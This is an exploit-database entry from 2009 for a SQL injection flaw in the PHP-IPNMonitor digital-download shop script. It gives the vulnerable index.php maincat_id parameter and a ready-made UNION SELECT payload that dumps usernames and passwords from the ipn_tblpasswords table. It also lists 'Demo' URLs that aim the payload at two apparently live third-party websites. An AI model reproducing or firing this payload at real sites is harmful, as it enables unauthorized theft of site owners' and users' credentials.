PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability

2009-09-11T00:00:00
ID 1337DAY-ID-5759
Type zdt
Reporter noname
Modified 2009-09-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability
==============================================================


[+] SQL injection vulnerability
[+] PHP-IPNMonitor - sell digital downloads online
[+] Download : http://www.withinweb.com/phpipnmonitor/
 
[+] Bugs = index.php?maincat_id=
 
[+] exploit = -null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--


[+] Example
[+]        : http://localhost/[patch]/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--



[+] Demo 
[+]        : http://www.beardsmith.com/ipnmonitor/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--
[+]	   : http://www.earrelaphant.com/ipnmonitor/cart/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--




#  0day.today [2018-03-14]  #